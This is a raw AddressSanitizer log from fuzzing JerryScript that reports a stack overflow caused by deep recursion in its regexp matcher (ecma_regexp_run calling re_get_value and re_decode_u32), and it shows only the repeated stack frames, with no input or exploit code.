=================================================================
==123642==ERROR: AddressSanitizer: stack-overflow on address 0xff407ffc (pc 0x081a87b8 bp 0xff408038 sp 0xff408000 T0)
#0 0x81a87b7 in re_decode_u32 /home/keven/Fuzzing/jerry-test/jerry-core/parser/regexp/re-bytecode.c:187
#1 0x81aa4f9 in re_get_value /home/keven/Fuzzing/jerry-test/jerry-core/parser/regexp/re-bytecode.c:266
#2 0x8140d50 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:803
#3 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#4 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#5 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#6 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#7 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#8 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#9 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#10 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#11 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#12 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#13 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#14 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#15 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#16 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#17 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#18 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#19 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#20 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#21 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#22 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#23 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#24 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#25 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#26 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#27 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#28 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#29 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#30 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#31 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#32 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#33 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#34 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#35 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#36 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#37 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#38 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#39 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#40 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#41 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#42 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#43 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#44 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#45 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#46 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#47 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#48 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#49 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#50 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#51 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#52 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#53 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#54 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#55 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#56 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#57 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#58 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#59 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#60 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#61 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#62 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#63 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#64 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#65 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#66 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#67 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#68 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#69 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#70 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#71 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#72 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#73 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#74 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#75 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#76 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#77 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#78 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#79 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#80 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#81 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#82 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#83 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#84 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#85 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#86 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#87 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#88 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#89 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#90 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#91 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#92 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#93 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#94 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#95 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#96 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#97 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#98 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#99 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#100 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#101 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#102 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#103 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#104 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#105 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#106 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#107 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#108 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#109 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#110 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#111 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#112 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#113 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#114 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#115 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#116 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#117 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#118 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#119 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#120 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#121 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#122 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#123 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#124 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#125 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#126 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#127 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#128 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#129 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#130 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#131 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#132 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#133 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#134 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#135 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#136 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#137 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#138 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#139 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#140 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#141 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#142 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#143 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#144 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#145 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#146 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#147 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#148 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#149 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#150 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#151 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#152 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#153 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#154 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#155 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#156 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#157 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#158 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#159 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#160 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#161 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#162 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#163 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#164 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#165 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#166 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#167 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#168 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#169 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#170 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#171 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#172 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#173 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#174 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#175 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#176 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#177 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#178 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#179 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#180 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#181 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#182 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#183 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#184 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#185 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#186 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#187 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#188 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#189 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#190 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#191 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#192 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#193 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#194 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#195 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#196 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#197 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#198 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#199 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#200 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#201 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#202 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#203 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#204 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#205 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#206 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#207 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#208 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#209 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#210 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#211 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#212 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#213 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#214 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#215 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#216 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#217 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#218 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#219 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#220 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#221 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#222 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#223 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#224 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#225 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#226 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#227 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#228 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
